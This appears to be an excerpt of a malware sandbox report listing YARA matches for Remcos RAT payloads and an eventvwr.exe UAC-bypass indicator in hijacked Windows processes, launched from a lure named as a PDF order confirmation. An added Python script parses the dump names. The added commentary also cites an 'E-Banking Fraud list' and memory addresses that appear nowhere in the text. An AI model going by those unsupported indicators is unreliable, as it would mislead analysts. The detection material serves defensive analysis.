Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
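The match lists above look longer than they are: the 18 UNPACKEDPE lines per rule are the same three regions (bases 0x400000, 0x10540000 and 0x1054198f) in three processes (indices 3 and 14, logagent.exe; index 15, DpiScaling.exe), each dumped raw and rebuilt, and the MEMORY matches sit at the same bases. The script below is an added example and not part of the sandbox report: it parses both dump-name conventions as they appear on this page, joins memory dumps to process images through the process index (the hex 0000000F of a memory-dump name is the decimal 15 of an unpack name), and reports per rule the distinct regions. Treating the field after the base address in a memory-dump name as a Win32 PAGE_* protection is this script's assumption, not documented format; the 0x04 and 0x40 values on this page fit PAGE_READWRITE and PAGE_EXECUTE_READWRITE.

```python
"""Normalise the YARA-match lines above so one payload is not counted once per
dump variant. Added example, not part of the sandbox report. Naming read off
this page: unpacked PE dumps are
'<process index>.<phase>.<image>.<base hex>.<n>[.raw].unpack' (the '.raw' and
rebuilt copies are the same region), memory dumps are
'<process index hex>.<phase hex>.<dump id>.<base hex>.<protect hex>....sdmp'.
Reading the field after the base as a Win32 PAGE_* protection is this script's
assumption; the 0x04 / 0x40 values on this page fit PAGE_READWRITE and
PAGE_EXECUTE_READWRITE."""
import re

LINE_RE = re.compile(
    r"^Source: (?P<src>\S+), type: (?P<kind>\w+) Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$")
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$")
MEMDUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f.]+\.sdmp$")

# Memory protection constants from WinNT.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Constructed sample: six match lines copied from this report.
SAMPLE = [
    "Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly",
    "Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly",
    "Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown",
    "Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen",
    "Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly",
    "Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly",
]


def parse_source(src):
    """Split a dump name into kind, process index, image, base (and protection) or None."""
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "pid": int(m["pid"]), "image": m["image"],
                "base": int(m["base"], 16), "raw": m["raw"] is not None}
    m = MEMDUMP_RE.match(src)
    if m:
        protect = int(m["protect"], 16) & 0xFF
        return {"kind": "memory", "pid": int(m["pid"], 16), "image": None,
                "base": int(m["base"], 16), "protect": PAGE_PROTECT.get(protect, hex(protect))}
    return None


def summarize(lines):
    """Per rule: images hit, distinct (process index, base) regions, and which of
    the memory-dump regions were executable when dumped."""
    hits = []
    image_by_pid = {}  # unpack names carry the image; memory dumps only the index
    for line in lines:
        m = LINE_RE.match(line)
        src = parse_source(m["src"]) if m else None
        if src is None:
            continue
        if src["image"]:
            image_by_pid[src["pid"]] = src["image"]
        hits.append((m["rule"], src))
    summary = {}
    for rule, src in hits:
        entry = summary.setdefault(rule, {"images": set(), "regions": set(), "executable_regions": set()})
        entry["images"].add(src["image"] or image_by_pid.get(src["pid"], f"process index {src['pid']}"))
        entry["regions"].add((src["pid"], src["base"]))
        if src["kind"] == "memory" and "EXECUTE" in src["protect"]:
            entry["executable_regions"].add((src["pid"], src["base"]))
    return summary


if __name__ == "__main__":
    for rule, e in summarize(SAMPLE).items():
        regions = ", ".join(f"{pid}:0x{base:X}" for pid, base in sorted(e["regions"]))
        print(f"{rule}: images={sorted(e['images'])} regions={regions} "
              f"executable={len(e['executable_regions'])}")
```

The executable-region count is the one worth escalating: a Remcos signature in a PAGE_EXECUTE_READWRITE region at 0x400000 of a process that started as a Windows binary (logagent.exe, DpiScaling.exe) is an injected or hollowed payload, while the PAGE_READWRITE hits at 0x31F0000, 0xD80000 and 0x4C00000 in the E-Banking Fraud list above are most likely the staging buffers the payload passed through before injection.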
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
